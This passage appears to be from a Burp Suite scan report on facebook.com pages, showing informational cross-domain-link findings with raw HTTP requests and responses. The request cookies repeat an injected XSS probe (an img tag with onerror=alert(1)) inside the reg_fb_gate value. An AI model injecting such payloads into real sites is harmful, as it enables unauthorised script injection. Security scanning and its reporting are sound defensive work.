http://static.ak.fbcdn.net/rsrc.php/v1/yu/r/5skHSErf84s.css
http://static.ak.fbcdn.net/rsrc.php/yi/r/q9U99v3_saj.ico

Request

GET /ajax/intl/language_dialog.php?uri=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.168.31
Connection: close
Date: Thu, 05 May 2011 11:42:17 GMT
Content-Length: 44083

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
</noscript>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yH/r/5HRFtNmxswh.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y9/r/GJUfkUG9iLr.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yu/r/5skHSErf84s.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/ys/r/6x5Oqo2nmb-.css" />

<script type="text/javascript" src="http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...
</script>
<link rel="search" type="application/opensearchdescription+xml" href="http://b.static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml" title="Facebook" />
<link rel="shortcut icon" href="http://static.ak.fbcdn.net/rsrc.php/yi/r/q9U99v3_saj.ico" /></head>
...[SNIP]...
<a class="lfloat" href="/" title="Go to Facebook Home"><img class="fb_logo img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yp/r/kk8dc2UJYJ4.png" alt="Facebook logo" width="170" height="36" /></a>
...[SNIP]...

16.32. http://www.facebook.com/careers/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/careers/

Issue detail

The page was loaded from a URL containing a query string:

http://www.facebook.com/careers/?ref=pf

The response contains the following links to other domains:

http://b.static.ak.fbcdn.net/rsrc.php/v1/y2/r/wCF9j03F8UH.css
http://b.static.ak.fbcdn.net/rsrc.php/v1/y8/r/rA11fLEN3pu.png
http://b.static.ak.fbcdn.net/rsrc.php/v1/yM/r/8KSjR8nTFnM.png
http://b.static.ak.fbcdn.net/rsrc.php/v1/yM/r/HlLCuk3U6Q6.css
http://b.static.ak.fbcdn.net/rsrc.php/v1/yP/r/VLLIdFco_FS.png
http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js
http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/p2EQhKqozYb.png
http://b.static.ak.fbcdn.net/rsrc.php/v1/yY/r/bNFbcydj77T.css
http://b.static.ak.fbcdn.net/rsrc.php/v1/yr/r/N5R94dW584a.png
http://b.static.ak.fbcdn.net/rsrc.php/v1/yv/r/KDo2iiCy_gr.png
http://b.static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml
http://static.ak.fbcdn.net/rsrc.php/v1/y4/r/th3CHMrbvY-.css
http://static.ak.fbcdn.net/rsrc.php/v1/y9/r/GJUfkUG9iLr.css
http://static.ak.fbcdn.net/rsrc.php/v1/yJ/r/dNZ8lADSyV5.png
http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/64Qw6hJnpsg.png
http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/BmRBrG86u58.png
http://static.ak.fbcdn.net/rsrc.php/v1/yj/r/OlBs86PzVAS.png
http://static.ak.fbcdn.net/rsrc.php/v1/yj/r/h_raeRCe0vp.png
http://static.ak.fbcdn.net/rsrc.php/v1/ym/r/IQqCjk5NiJN.png
http://static.ak.fbcdn.net/rsrc.php/v1/yp/r/kk8dc2UJYJ4.png
http://static.ak.fbcdn.net/rsrc.php/v1/ys/r/6x5Oqo2nmb-.css
http://static.ak.fbcdn.net/rsrc.php/v1/yu/r/5skHSErf84s.css
http://static.ak.fbcdn.net/rsrc.php/v1/yv/r/MoxBq-TLXDr.jpg
http://static.ak.fbcdn.net/rsrc.php/yi/r/q9U99v3_saj.ico

Request

GET /careers/?ref=pf HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fcareers%2F%3Fref%3Dpf; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.151.69
Connection: close
Date: Thu, 05 May 2011 11:43:02 GMT
Content-Length: 20523

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
</noscript>
<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/v1/y2/r/wCF9j03F8UH.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y9/r/GJUfkUG9iLr.css" />
<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/v1/yM/r/HlLCuk3U6Q6.css" />
<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/v1/yY/r/bNFbcydj77T.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y4/r/th3CHMrbvY-.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yu/r/5skHSErf84s.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/ys/r/6x5Oqo2nmb-.css" />

<script type="text/javascript" src="http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...
</script>
<link rel="search" type="application/opensearchdescription+xml" href="http://b.static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml" title="Facebook" />
<link rel="shortcut icon" href="http://static.ak.fbcdn.net/rsrc.php/yi/r/q9U99v3_saj.ico" /></head>
...[SNIP]...
<a class="lfloat" href="/" title="Go to Facebook Home"><img class="fb_logo img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yp/r/kk8dc2UJYJ4.png" alt="Facebook logo" width="170" height="36" /></a>
...[SNIP]...
<div id="home_welcome"><img class="img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yv/r/MoxBq-TLXDr.jpg" /><div class="home_header_description">
...[SNIP]...
<a href="/careers/department.php?dept=engineering"><img src="http://b.static.ak.fbcdn.net/rsrc.php/v1/yM/r/8KSjR8nTFnM.png" class="careers_dept_img" title="Software Engineering" alt="Software Engineering" /></a>
...[SNIP]...
<a href="/careers/department.php?dept=legal"><img src="http://static.ak.fbcdn.net/rsrc.php/v1/ym/r/IQqCjk5NiJN.png" class="careers_dept_img" title="Legal, Finance, Facilities & Admin" alt="Legal, Finance, Facilities & Admin" /></a>
...[SNIP]...
<a href="/careers/department.php?dept=communications"><img src="http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/64Qw6hJnpsg.png" class="careers_dept_img" title="Communications & Public Policy" alt="Communications & Public Policy" /></a>
...[SNIP]...
<a href="/careers/department.php?dept=product-management"><img src="http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/BmRBrG86u58.png" class="careers_dept_img" title="Product Management" alt="Product Management" /></a>
...[SNIP]...
<a href="/careers/department.php?dept=IT"><img src="http://b.static.ak.fbcdn.net/rsrc.php/v1/yv/r/KDo2iiCy_gr.png" class="careers_dept_img" title="IT & Security" alt="IT & Security" /></a>
...[SNIP]...
<a href="/careers/department.php?dept=hr"><img src="http://static.ak.fbcdn.net/rsrc.php/v1/yJ/r/dNZ8lADSyV5.png" class="careers_dept_img" title="HR & Recruiting" alt="HR & Recruiting" /></a>
...[SNIP]...
<a href="/careers/department.php?dept=design"><img src="http://static.ak.fbcdn.net/rsrc.php/v1/yj/r/OlBs86PzVAS.png" class="careers_dept_img" title="Design & User Experience" alt="Design & User Experience" /></a>
...[SNIP]...
<a href="/careers/department.php?dept=tech-ops"><img src="http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/p2EQhKqozYb.png" class="careers_dept_img" title="Technical Operations" alt="Technical Operations" /></a>
...[SNIP]...
<a href="/careers/department.php?dept=growth"><img src="http://b.static.ak.fbcdn.net/rsrc.php/v1/yP/r/VLLIdFco_FS.png" class="careers_dept_img" title="Growth & Internationalization" alt="Growth & Internationalization" /></a>
...[SNIP]...
<a href="/careers/department.php?dept=sales"><img src="http://b.static.ak.fbcdn.net/rsrc.php/v1/y8/r/rA11fLEN3pu.png" class="careers_dept_img" title="Sales & Business Development" alt="Sales & Business Development" /></a>
...[SNIP]...
<a href="/careers/department.php?dept=online-ops"><img src="http://static.ak.fbcdn.net/rsrc.php/v1/yj/r/h_raeRCe0vp.png" class="careers_dept_img" title="Online Operations" alt="Online Operations" /></a>
...[SNIP]...
<a href="/careers/department.php?dept=platform"><img src="http://b.static.ak.fbcdn.net/rsrc.php/v1/yr/r/N5R94dW584a.png" class="careers_dept_img" title="Platform & Product Marketing" alt="Platform & Product Marketing" /></a>
...[SNIP]...

16.33. http://www.facebook.com/find-friends previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/find-friends

Issue detail

The page was loaded from a URL containing a query string:

http://www.facebook.com/find-friends?ref=pf

The response contains the following links to other domains:

http://static.ak.fbcdn.net/rsrc.php/v1/yD/r/rZiaNe7iEDZ.css
http://static.ak.fbcdn.net/rsrc.php/v1/yE/r/zicApnLO7GQ.css
http://static.ak.fbcdn.net/rsrc.php/v1/yI/r/5ZAfR7_4gQg.css
http://static.ak.fbcdn.net/rsrc.php/v1/yQ/r/9qdm_pQmTM3.css
http://static.ak.fbcdn.net/rsrc.php/v1/yU/r/abFky1K8JdH.css
http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js
http://static.ak.fbcdn.net/rsrc.php/v1/y_/r/2OeU71A9ZhJ.css
http://static.ak.fbcdn.net/rsrc.php/v1/yb/r/GsNJNwuI-UM.gif
http://static.ak.fbcdn.net/rsrc.php/v1/yi/r/xKbCsbIPd0I.css
http://static.ak.fbcdn.net/rsrc.php/v1/yk/r/nKcHzwvsYY2.css
http://static.ak.fbcdn.net/rsrc.php/v1/yl/r/h7_K_gtPWhX.css
http://static.ak.fbcdn.net/rsrc.php/v1/yp/r/2XNEznNudOF.css
http://static.ak.fbcdn.net/rsrc.php/v1/yp/r/kk8dc2UJYJ4.png
http://static.ak.fbcdn.net/rsrc.php/v1/yu/r/zA_b_yEgHGT.css
http://static.ak.fbcdn.net/rsrc.php/v1/yv/r/YAJGksZgfUN.css
http://static.ak.fbcdn.net/rsrc.php/v1/yy/r/icQpW-keluF.css

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: _e_nXwy_0=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Ffind-friends%3Fref%3Dpf; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.188.21
X-Cnection: close
Date: Thu, 05 May 2011 11:43:46 GMT
Content-Length: 101594

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
</noscript>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y_/r/2OeU71A9ZhJ.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yD/r/rZiaNe7iEDZ.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yU/r/abFky1K8JdH.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yI/r/5ZAfR7_4gQg.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yQ/r/9qdm_pQmTM3.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yp/r/2XNEznNudOF.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yE/r/zicApnLO7GQ.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yi/r/xKbCsbIPd0I.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yy/r/icQpW-keluF.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yv/r/YAJGksZgfUN.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yl/r/h7_K_gtPWhX.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yu/r/zA_b_yEgHGT.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yk/r/nKcHzwvsYY2.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...
<a class="lfloat" href="/" title="Go to Facebook Home"><img class="fb_logo img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yp/r/kk8dc2UJYJ4.png" alt="Facebook logo" width="170" height="36" /></a>
...[SNIP]...
</label><img class="mts mls uiLoadingIndicatorAsync img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yb/r/GsNJNwuI-UM.gif" width="16" height="11" /></div>
...[SNIP]...
</label><img class="mts mls uiLoadingIndicatorAsync img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yb/r/GsNJNwuI-UM.gif" width="16" height="11" /></div>
...[SNIP]...
</label><img class="mts mls uiLoadingIndicatorAsync img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yb/r/GsNJNwuI-UM.gif" width="16" height="11" /></div>
...[SNIP]...
</label><img class="mts mls uiLoadingIndicatorAsync img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yb/r/GsNJNwuI-UM.gif" width="16" height="11" /></div>
...[SNIP]...
</label><img class="mts mls uiLoadingIndicatorAsync img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yb/r/GsNJNwuI-UM.gif" width="16" height="11" /></div>
...[SNIP]...
</label><img class="mts mls uiLoadingIndicatorAsync img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yb/r/GsNJNwuI-UM.gif" width="16" height="11" /></div>
...[SNIP]...
</label><img class="mts mls uiLoadingIndicatorAsync img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yb/r/GsNJNwuI-UM.gif" width="16" height="11" /></div>
...[SNIP]...
</label><img class="mts mls uiLoadingIndicatorAsync img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yb/r/GsNJNwuI-UM.gif" width="16" height="11" /></div>
...[SNIP]...
</label><img class="mts mls uiLoadingIndicatorAsync img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yb/r/GsNJNwuI-UM.gif" width="16" height="11" /></div>
...[SNIP]...
</label><img class="mts mls uiLoadingIndicatorAsync img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yb/r/GsNJNwuI-UM.gif" width="16" height="11" /></div>
...[SNIP]...
</label><img class="mts mls uiLoadingIndicatorAsync img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yb/r/GsNJNwuI-UM.gif" width="16" height="11" /></div>
...[SNIP]...
</label><img class="mts mls uiLoadingIndicatorAsync img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yb/r/GsNJNwuI-UM.gif" width="16" height="11" /></div>
...[SNIP]...
</label><img class="mts mls uiLoadingIndicatorAsync img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yb/r/GsNJNwuI-UM.gif" width="16" height="11" /></div>
...[SNIP]...
</label><img class="mts mls uiLoadingIndicatorAsync img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yb/r/GsNJNwuI-UM.gif" width="16" height="11" /></div>
...[SNIP]...
</label><img class="mts mls uiLoadingIndicatorAsync img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yb/r/GsNJNwuI-UM.gif" width="16" height="11" /></div>
...[SNIP]...

16.34. http://www.facebook.com/find-friends previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/find-friends

Issue detail

The page was loaded from a URL containing a query string:

http://www.facebook.com/find-friends?ref=pf

The response contains the following links to other domains:

http://b.static.ak.fbcdn.net/rsrc.php/v1/yB/r/g1_xu8gB24T.css
http://b.static.ak.fbcdn.net/rsrc.php/v1/yD/r/0d5n7jCSVre.css
http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js
http://b.static.ak.fbcdn.net/rsrc.php/v1/y_/r/LIzUXgNfPj0.css
http://b.static.ak.fbcdn.net/rsrc.php/v1/yb/r/GsNJNwuI-UM.gif
http://b.static.ak.fbcdn.net/rsrc.php/v1/yh/r/u4-kKjNrCF1.css
http://b.static.ak.fbcdn.net/rsrc.php/v1/yp/r/2XNEznNudOF.css
http://static.ak.fbcdn.net/rsrc.php/v1/y1/r/PCbd6PhRsDA.css
http://static.ak.fbcdn.net/rsrc.php/v1/y9/r/GJUfkUG9iLr.css
http://static.ak.fbcdn.net/rsrc.php/v1/yG/r/F6vZSVqitFo.css
http://static.ak.fbcdn.net/rsrc.php/v1/y_/r/2OeU71A9ZhJ.css
http://static.ak.fbcdn.net/rsrc.php/v1/ye/r/TP-A71t1sFT.css
http://static.ak.fbcdn.net/rsrc.php/v1/ym/r/OelUOcifsbh.css
http://static.ak.fbcdn.net/rsrc.php/v1/yp/r/kk8dc2UJYJ4.png
http://static.ak.fbcdn.net/rsrc.php/v1/ys/r/6x5Oqo2nmb-.css
http://static.ak.fbcdn.net/rsrc.php/v1/yu/r/5skHSErf84s.css

Request

GET /find-friends?ref=pf HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Ffind-friends%3Fref%3Dpf; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.166.37
Connection: close
Date: Thu, 05 May 2011 11:42:55 GMT
Content-Length: 101670

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
</noscript>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y_/r/2OeU71A9ZhJ.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y9/r/GJUfkUG9iLr.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y1/r/PCbd6PhRsDA.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yu/r/5skHSErf84s.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/ys/r/6x5Oqo2nmb-.css" />
<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/v1/yp/r/2XNEznNudOF.css" />
<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/v1/yB/r/g1_xu8gB24T.css" />
<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/v1/y_/r/LIzUXgNfPj0.css" />
<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/v1/yD/r/0d5n7jCSVre.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yG/r/F6vZSVqitFo.css" />
<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/v1/yh/r/u4-kKjNrCF1.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/ym/r/OelUOcifsbh.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/ye/r/TP-A71t1sFT.css" />

<script type="text/javascript" src="http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...
<a class="lfloat" href="/" title="Go to Facebook Home"><img class="fb_logo img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yp/r/kk8dc2UJYJ4.png" alt="Facebook logo" width="170" height="36" /></a>
...[SNIP]...
</label><img class="mts mls uiLoadingIndicatorAsync img" src="http://b.static.ak.fbcdn.net/rsrc.php/v1/yb/r/GsNJNwuI-UM.gif" width="16" height="11" /></div>
...[SNIP]...
</label><img class="mts mls uiLoadingIndicatorAsync img" src="http://b.static.ak.fbcdn.net/rsrc.php/v1/yb/r/GsNJNwuI-UM.gif" width="16" height="11" /></div>
...[SNIP]...
</label><img class="mts mls uiLoadingIndicatorAsync img" src="http://b.static.ak.fbcdn.net/rsrc.php/v1/yb/r/GsNJNwuI-UM.gif" width="16" height="11" /></div>
...[SNIP]...
</label><img class="mts mls uiLoadingIndicatorAsync img" src="http://b.static.ak.fbcdn.net/rsrc.php/v1/yb/r/GsNJNwuI-UM.gif" width="16" height="11" /></div>
...[SNIP]...
</label><img class="mts mls uiLoadingIndicatorAsync img" src="http://b.static.ak.fbcdn.net/rsrc.php/v1/yb/r/GsNJNwuI-UM.gif" width="16" height="11" /></div>
...[SNIP]...
</label><img class="mts mls uiLoadingIndicatorAsync img" src="http://b.static.ak.fbcdn.net/rsrc.php/v1/yb/r/GsNJNwuI-UM.gif" width="16" height="11" /></div>
...[SNIP]...
</label><img class="mts mls uiLoadingIndicatorAsync img" src="http://b.static.ak.fbcdn.net/rsrc.php/v1/yb/r/GsNJNwuI-UM.gif" width="16" height="11" /></div>
...[SNIP]...
</label><img class="mts mls uiLoadingIndicatorAsync img" src="http://b.static.ak.fbcdn.net/rsrc.php/v1/yb/r/GsNJNwuI-UM.gif" width="16" height="11" /></div>
...[SNIP]...
</label><img class="mts mls uiLoadingIndicatorAsync img" src="http://b.static.ak.fbcdn.net/rsrc.php/v1/yb/r/GsNJNwuI-UM.gif" width="16" height="11" /></div>
...[SNIP]...
</label><img class="mts mls uiLoadingIndicatorAsync img" src="http://b.static.ak.fbcdn.net/rsrc.php/v1/yb/r/GsNJNwuI-UM.gif" width="16" height="11" /></div>
...[SNIP]...
</label><img class="mts mls uiLoadingIndicatorAsync img" src="http://b.static.ak.fbcdn.net/rsrc.php/v1/yb/r/GsNJNwuI-UM.gif" width="16" height="11" /></div>
...[SNIP]...
</label><img class="mts mls uiLoadingIndicatorAsync img" src="http://b.static.ak.fbcdn.net/rsrc.php/v1/yb/r/GsNJNwuI-UM.gif" width="16" height="11" /></div>
...[SNIP]...
</label><img class="mts mls uiLoadingIndicatorAsync img" src="http://b.static.ak.fbcdn.net/rsrc.php/v1/yb/r/GsNJNwuI-UM.gif" width="16" height="11" /></div>
...[SNIP]...
</label><img class="mts mls uiLoadingIndicatorAsync img" src="http://b.static.ak.fbcdn.net/rsrc.php/v1/yb/r/GsNJNwuI-UM.gif" width="16" height="11" /></div>
...[SNIP]...
</label><img class="mts mls uiLoadingIndicatorAsync img" src="http://b.static.ak.fbcdn.net/rsrc.php/v1/yb/r/GsNJNwuI-UM.gif" width="16" height="11" /></div>
...[SNIP]...

16.35. http://www.facebook.com/help/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/help/

Issue detail

The page was loaded from a URL containing a query string:

http://www.facebook.com/help/?ref=pf

The response contains the following links to other domains:

http://static.ak.fbcdn.net/rsrc.php/v1/yD/r/rZiaNe7iEDZ.css
http://static.ak.fbcdn.net/rsrc.php/v1/yE/r/JQgQHls27pw.png
http://static.ak.fbcdn.net/rsrc.php/v1/yG/r/CYgI95uCQNj.png
http://static.ak.fbcdn.net/rsrc.php/v1/yI/r/5ZAfR7_4gQg.css
http://static.ak.fbcdn.net/rsrc.php/v1/yQ/r/9qdm_pQmTM3.css
http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js
http://static.ak.fbcdn.net/rsrc.php/v1/yW/r/iitWafmrmXE.css
http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/HZ2miH23DO_.css
http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/hapiV4URFzS.png
http://static.ak.fbcdn.net/rsrc.php/v1/yb/r/GsNJNwuI-UM.gif
http://static.ak.fbcdn.net/rsrc.php/v1/yb/r/VVIvW-eIGKG.png
http://static.ak.fbcdn.net/rsrc.php/v1/yh/r/tbLZ3xbV8NS.css
http://static.ak.fbcdn.net/rsrc.php/v1/yk/r/G56BmZyYUs2.png
http://static.ak.fbcdn.net/rsrc.php/v1/yk/r/ijofM1PtQgR.css
http://static.ak.fbcdn.net/rsrc.php/v1/yk/r/nKcHzwvsYY2.css
http://static.ak.fbcdn.net/rsrc.php/v1/ym/r/zhBrOmLKnYo.css
http://static.ak.fbcdn.net/rsrc.php/v1/yp/r/kk8dc2UJYJ4.png
http://static.ak.fbcdn.net/rsrc.php/v1/yr/r/GzjD8q3xBN2.png
http://static.ak.fbcdn.net/rsrc.php/v1/yv/r/YAJGksZgfUN.css
http://static.ak.fbcdn.net/rsrc.php/v1/yy/r/uunxaUcHMsN.png
http://static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml
http://static.ak.fbcdn.net/rsrc.php/yi/r/q9U99v3_saj.ico

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
